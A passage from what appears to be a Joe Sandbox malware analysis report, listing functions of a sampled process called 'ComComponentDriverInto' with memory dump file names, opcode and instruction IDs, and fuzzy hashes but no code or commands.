                                                            • Opcode Fuzzy Hash: acc5ab83101f31b1264e0e5bd22dd50b26b496943b088373ffbb0fd2d621c9f9
                                                            • Instruction Fuzzy Hash: 2FE0C231E2D52E8EDBA8DB86D8615FDB675FF48710F110176D01EE21A2DA292A008B50
                                                            Function 00007FFD9BAB505B Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18609a6e645cb35485c4b838bda7368a167c568e061452429b3ab97f71e0e019
                                                            • Instruction ID: cbbff0141c9e0c20b090190d00a0246f5690d66c31e1d0599c08192557de4d8e
                                                            • Opcode Fuzzy Hash: 18609a6e645cb35485c4b838bda7368a167c568e061452429b3ab97f71e0e019
                                                            • Instruction Fuzzy Hash: BBE09224F0D02A47F7B05784C8603AD3264EB88300F2540BCD9AE933D2CD78AE058F09
                                                            Function 00007FFD9BAB5790 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43fbc07a219e62a2d9ea863c9e0a02d964475fa3f7231a4b3c3f2db79e64f50b
                                                            • Instruction ID: 395c6d1cdb665fa4788db5321c2ccb136ec6597b2c1fd030b7bcd9dbe4f40c74
                                                            • Opcode Fuzzy Hash: 43fbc07a219e62a2d9ea863c9e0a02d964475fa3f7231a4b3c3f2db79e64f50b
                                                            • Instruction Fuzzy Hash: 0AE01221F1E5690AF7BCA7A908333B850C6DF98710F4A41BDE16EC72D3DC982D410796
                                                            Function 00007FFD9BAB0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                            • Instruction ID: d07999e1335c793ccfb0a87c31a48d0db7aae3eb697ea8392f9bdd301b456734
                                                            • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                            • Instruction Fuzzy Hash: C8D0A73026954E4FDE40A77CC8498547BA0FB0F214FD614F1D00AC7961C50949658B00
                                                            Function 00007FFD9BEB8BC7 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7551c17cfb762093ad31a071464d428bc4f50b3e953724117bdc44c9ccc0516
                                                            • Instruction ID: 57805d418c5401a85140f4ce8e423073f23a09af49b0e0fe3aacff0992d7074a
                                                            • Opcode Fuzzy Hash: f7551c17cfb762093ad31a071464d428bc4f50b3e953724117bdc44c9ccc0516
                                                            • Instruction Fuzzy Hash: D2D05BC2B0E75947FB7501B508B61B417C88B7634175B0176819A863E1DD8519424751
                                                            Function 00007FFD9BEB7EFC Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f268fa9f4f6758e3cf88ba14d59e891cec774c3ab23243a5ba8799c2f3085e0
                                                            • Instruction ID: 61ab0b82cd97aa2bb974172587d575c54398642e60b4b962e536e71f1d6d5730
                                                            • Opcode Fuzzy Hash: 1f268fa9f4f6758e3cf88ba14d59e891cec774c3ab23243a5ba8799c2f3085e0
                                                            • Instruction Fuzzy Hash: 9FD0C73192F28DC6EB30EF9084210EC7B24FF00204F2000BAE80A028A1DA256B18AB86
                                                            Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75ff3a9e5439b36d679550c82c544546d1f302f36b3946c8c001b02f26fdcac2
                                                            • Instruction ID: 2d1fcb4e4acc1e52a11af5cd85bf6d9e0b12cb0f362560e254f067ed4a2d0a74
                                                            • Opcode Fuzzy Hash: 75ff3a9e5439b36d679550c82c544546d1f302f36b3946c8c001b02f26fdcac2
                                                            • Instruction Fuzzy Hash: 79C01200F0B52E00E43033AB18220ACA100ABC4A10FD70132D128800A1A8DD2285095A
                                                            Function 00007FFD9BAB12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction ID: a99b7e5c94f45a5f7f09ca02380e0e68ea50f76bdd34d6ae977846784e90f1ae
                                                            • Opcode Fuzzy Hash: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction Fuzzy Hash: 2DC08C3051180C8FC908EB28C88490433A0FB09300BC20090E008C7171D659DCC1CB80
                                                            Function 00007FFD9BEBEC2B Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb833ca749609f7314fa75941b5abe83b9a645aae4ae4f94cbd0fed6fbd6c0f2
                                                            • Instruction ID: 77ae4bda5366d273907ed1b0b411d593cb52b9238af55041abcd65740ae5193e
                                                            • Opcode Fuzzy Hash: eb833ca749609f7314fa75941b5abe83b9a645aae4ae4f94cbd0fed6fbd6c0f2
                                                            • Instruction Fuzzy Hash: 92D09210B0F6AF85F1B85683417023955A96F00701E6A4839E09F458F5C92EBB016F02
                                                            Function 00007FFD9BEBBF80 Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                            • Instruction ID: db7eb27d9785c7c9981c92b7c0a8c18c178f3e342d064d218a915310eded2ab9
                                                            • Opcode Fuzzy Hash: 7164194e321ff11a9c5b58660fdeb581821e2c8107603c55c42c51c06a3cb97c
                                                            • Instruction Fuzzy Hash: A6C012203088288FDAA8CB4AC4A4A3872D5EF08301B9100B4E40BCB2B5C929A905AB00
                                                            Function 00007FFD9BEB467B Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f8dfc65ad8f16764ccc8153da7c79aea334c30a54bafc06d7afd781634f2bd3
                                                            • Instruction ID: a182c1307abcb8ca7bd355204ee6fb189cc277c0933f647c2c8c65a8c900aca1
                                                            • Opcode Fuzzy Hash: 1f8dfc65ad8f16764ccc8153da7c79aea334c30a54bafc06d7afd781634f2bd3
                                                            • Instruction Fuzzy Hash: ADD09220B0F57F86F6794683407023916B85F04300E22103ED05F459E9C96A7A016B02
                                                            Function 00007FFD9BAB41A9 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21fe969f979db333674e9901948d5af90cb4b426e3a09795154c338914e8feb9
                                                            • Instruction ID: 7cf7a66eddc945f51007b1b51673eb98cbd99f151899c3a8b6cc7b8046a72e6b
                                                            • Opcode Fuzzy Hash: 21fe969f979db333674e9901948d5af90cb4b426e3a09795154c338914e8feb9
                                                            • Instruction Fuzzy Hash: 95C04C05F2DC2A17F3696654443167E14465F58728F654278E11EC62DECD5C6E0206CA
                                                            Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction ID: eccdf8cfbf9cd412e5466d34cebb3af26285ed419c63ac22be4ef502e8be397d
                                                            • Opcode Fuzzy Hash: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction Fuzzy Hash: 0BB01200D5741F00E43433FB0C520687440AB44200FC60170D41D90091A8CD12940A57
                                                            Function 00007FFD9BEB3BB0 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2498288653.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9beb0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 840064bd7cbd5315ab64a15e3181d36e4c11e2de9601b1951485b497951bf716
                                                            • Instruction ID: dfac7cfc0e462e37967af287f3732e25c8ed5f2d4b8babf7520309788d81fdeb
                                                            • Opcode Fuzzy Hash: 840064bd7cbd5315ab64a15e3181d36e4c11e2de9601b1951485b497951bf716
                                                            • Instruction Fuzzy Hash: E3B09211F0922743EA3100E608A51B842898BC42806920A32911E822A2ECAA2A0A1A50

                                                            Non-executed Functions

                                                            Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2292779299.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_7ffd9bab0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 72508798ecfcbe849ff4fddf2b1385e41789dc75ff7a1a2a926d9faf0f82ff58
                                                            • Instruction ID: d9f0b3401275e26a1a7716e28a2282d73f49f7fa59f4ff89c81f0dab8ec626c9
                                                            • Opcode Fuzzy Hash: 72508798ecfcbe849ff4fddf2b1385e41789dc75ff7a1a2a926d9faf0f82ff58
                                                            • Instruction Fuzzy Hash: DF418F07B0957645E23973FD78219ED5B448FA927FB0847B7F56E8D0D74C486081C2E9

                                                            Executed Functions

                                                            Function 00007FFD9BAA0D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: f1bc9cf4f546e7fc7e57e1daad284c826bab4008c814b86260e7b338cf36cce9
                                                            • Instruction ID: b2a3f94d93c7803910349d8bd98c56884f2b0959732ca33ae05fc2c742d7a40e
                                                            • Opcode Fuzzy Hash: f1bc9cf4f546e7fc7e57e1daad284c826bab4008c814b86260e7b338cf36cce9
                                                            • Instruction Fuzzy Hash: 8D91E172A19A8D4FE799CB68C8657A87FE1FF99310F0101BAD049DB7E2CBB818118750
                                                            Function 00007FFD9BAA090D Relevance: .1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0acdcf10d4879fe2170a0bde597c9ada0af49b8d00787437736c1976dd4630f2
                                                            • Instruction ID: 9ec86c907de256ba70c86154cb74bea36a086307b22e482fa710bd1d7bc38876
                                                            • Opcode Fuzzy Hash: 0acdcf10d4879fe2170a0bde597c9ada0af49b8d00787437736c1976dd4630f2
                                                            • Instruction Fuzzy Hash: C5315912B0D55A1EE328B3BC74B9AF86BC1DF4933AF1445BBE44DCA1E7DE086841C294
                                                            Function 00007FFD9BAA0908 Relevance: .1, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction ID: 9a76a4bb2ca4998e72b810c9e087cc460832d1f4d9696864cbea9ab0d5a55eb2
                                                            • Opcode Fuzzy Hash: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction Fuzzy Hash: 9121E43130DC184FE768EB4CE88A9B977D1EB9932171101BAE58EC7176E951EC8287C1
                                                            Function 00007FFD9BAA0998 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f74f9168cd1b00fa37c6643fa17965e6b656ef7a61ba1ed647e9808205f9cb67
                                                            • Instruction ID: 55dfd32d44f4d427f24bb6c2af251a238818407d0d960edc5d6c5f020c6aec9d
                                                            • Opcode Fuzzy Hash: f74f9168cd1b00fa37c6643fa17965e6b656ef7a61ba1ed647e9808205f9cb67
                                                            • Instruction Fuzzy Hash: 7D213420B1891D0FE798B72C9469B7976C2EF99321F0100B9E40EC32F6CE54AC028291
                                                            Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2f059eef96e1c3ed92649436855abaff897e1ae6944103f07031785520781b1
                                                            • Instruction ID: 91bd972b7c68c0cd6dda3ff05b002d119c155298459b09d835178a019470a436
                                                            • Opcode Fuzzy Hash: e2f059eef96e1c3ed92649436855abaff897e1ae6944103f07031785520781b1
                                                            • Instruction Fuzzy Hash: 87210736B0D25D4FE732ABA898510DC7B60EF82325F0546B3D05C8F1D3D968264AC7A5
                                                            Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52235a417d81fe07695c8e83f7bf0aa083ef7cb39f8a58b095d145f5c79e55f8
                                                            • Instruction ID: b3b80aec283957e9fae04635cbd0e137002da8cca8ae602e854e0546974d9463
                                                            • Opcode Fuzzy Hash: 52235a417d81fe07695c8e83f7bf0aa083ef7cb39f8a58b095d145f5c79e55f8
                                                            • Instruction Fuzzy Hash: 0E11C636B0E78D8FE721DFA888611DC7FB1EF42711F0645B7D088DB1A2D574264987A4
                                                            Function 00007FFD9BAA4B41 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4919f659e9e9755eb29cbf4bb3a7bb58f4356f64c81d6fa416d690c3807412a9
                                                            • Instruction ID: 14a4b7918656457ed95fa39685e183649baa1b3ddcc0f5f2da0762d9cbbcee0a
                                                            • Opcode Fuzzy Hash: 4919f659e9e9755eb29cbf4bb3a7bb58f4356f64c81d6fa416d690c3807412a9
                                                            • Instruction Fuzzy Hash: 4B11C620F0D50E4BE7B4EB58D8666B872D2EF44700F5101BDE84DC32F2EE686A404695
                                                            Function 00007FFD9BAA2AFA Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5f8f4378544ac185960698d72a18b2a14614b80c2428a5f4821ce72388f6ca3
                                                            • Instruction ID: 5c0740c5f140d1512659d3f011e86ef622ce66f2004dc241c3a4bb7258549fc8
                                                            • Opcode Fuzzy Hash: c5f8f4378544ac185960698d72a18b2a14614b80c2428a5f4821ce72388f6ca3
                                                            • Instruction Fuzzy Hash: ED119C31A08A1D8FDB64DF44C454BA9B3A2EB64311F1541BAD44EE72A0CAB5AED5CF40
                                                            Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
                                                            • Instruction ID: ebb97b2b2a35c82dcf8eea23c79aa98968cd2473da698bc02f9ff0859e3832ad
                                                            • Opcode Fuzzy Hash: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
                                                            • Instruction Fuzzy Hash: 5011A136A0E38D8FE722DFA888A01DD7FB1EF42711F0645F7D088DB1A2D57466498764
                                                            Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71f5de77be2670f597288237adeeb9157df1988227c3384db0536af02e4b6afe
                                                            • Instruction ID: b9b214a0c2509cd61329f446c7c1f3e820f2459f313fdd798b2ede30d06b83c7
                                                            • Opcode Fuzzy Hash: 71f5de77be2670f597288237adeeb9157df1988227c3384db0536af02e4b6afe
                                                            • Instruction Fuzzy Hash: 13019235A0E38D9FD721DFA4C89019CBFB1EF02710F1641E7D048DB1A2D5746645C754
                                                            Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 686c2b0a866b0c144d5eaf08c3534a3be37dd168d070065e161fbc4cca82279f
                                                            • Instruction ID: 6769a9a40feb0f1509c5f6cd414370b56a8de65522aab028926debe777af5c1d
                                                            • Opcode Fuzzy Hash: 686c2b0a866b0c144d5eaf08c3534a3be37dd168d070065e161fbc4cca82279f
                                                            • Instruction Fuzzy Hash: 9501BC31A0E38D9FEB21DBA488A009CBFB1AF02700F1542E7D088CB2A2D9786A44C754
                                                            Function 00007FFD9BAA4B84 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction ID: ffe5decdc269832d90e4e5e91cd51baf29360e1af7d4d018a4f91488d6de84a2
                                                            • Opcode Fuzzy Hash: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction Fuzzy Hash: D5013630A0941E4EEBB8EB94D8657F873A2FF54310F1101BDD84DD35B1DEB86A918A15
                                                            Function 00007FFD9BAA5788 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 729d9c1892bb741b64810aa4cff6336e980ae3c6a7f2640dcfef33bcf3e2b684
                                                            • Instruction ID: fbb58f86f4e10d5bff204a3ddd135d15a8885a0b3625772763cf1cff50bb05be
                                                            • Opcode Fuzzy Hash: 729d9c1892bb741b64810aa4cff6336e980ae3c6a7f2640dcfef33bcf3e2b684
                                                            • Instruction Fuzzy Hash: 8DF02411F1E1AA4AF77493A448353F86A83AF4A310F0A00B9D54DE72E2DC8C2A02436A
                                                            Function 00007FFD9BAA4BBB Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52272e81ee654107e1d0777ee8ff2532bfd0e3d34d4778b7801a48937b26d3f8
                                                            • Instruction ID: bd8a7cd43797f505123ec777e7c4081c269f0b16870e1c9f8f4c5fc6cefec95e
                                                            • Opcode Fuzzy Hash: 52272e81ee654107e1d0777ee8ff2532bfd0e3d34d4778b7801a48937b26d3f8
                                                            • Instruction Fuzzy Hash: F7F05430B0940E4AEAB8EB44E4667F87393EF54300F1141BDEC4DC32F2DE696E954655
                                                            Function 00007FFD9BAA0CBF Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f512f9ea119dbc663bb96ae0868fd10e49aa86f4f9dccab09bd6480b62b417a
                                                            • Instruction ID: 75d7af3bcb9a51628d6d82df642fafb50c27bab818fd653e59c28849a46b9fcd
                                                            • Opcode Fuzzy Hash: 2f512f9ea119dbc663bb96ae0868fd10e49aa86f4f9dccab09bd6480b62b417a
                                                            • Instruction Fuzzy Hash: 99F0B430B0920D8BF764DF54C4947BC77A1AF60750F0141BAD00DC22E5DAB866848B44
                                                            Function 00007FFD9BAA505B Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18609a6e645cb35485c4b838bda7368a167c568e061452429b3ab97f71e0e019
                                                            • Instruction ID: 122071692d8ddff41e9894dd258fdd2f1736a1d91898ef44fe16dd58dd5841af
                                                            • Opcode Fuzzy Hash: 18609a6e645cb35485c4b838bda7368a167c568e061452429b3ab97f71e0e019
